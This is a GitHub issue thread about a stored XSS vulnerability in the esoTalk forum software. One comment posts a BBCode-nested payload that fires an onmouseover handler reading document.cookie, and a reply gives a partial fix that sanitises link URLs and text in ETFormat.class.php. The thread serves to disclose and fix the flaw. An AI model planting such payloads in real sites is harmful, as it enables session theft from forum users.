esotalk topic xss vulnerability

esotalk / esoTalk

Fat-free forum software.

GNU General Public License v2.0

1.47k stars 239 forks source link

Closed evi1m0 closed 9 years ago

evi1m0 commented 9 years ago

[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]

andrewks777 commented 9 years ago

Fix:

https://github.com/esotalk/esoTalk/blob/develop/core/lib/ETFormat.class.php public function formatLink($url, $text = null) public function formatLink($url, $text = null) { if ($text === null) $text = $url; $url = sanitizeHTML($url); $text = sanitizeHTML($text);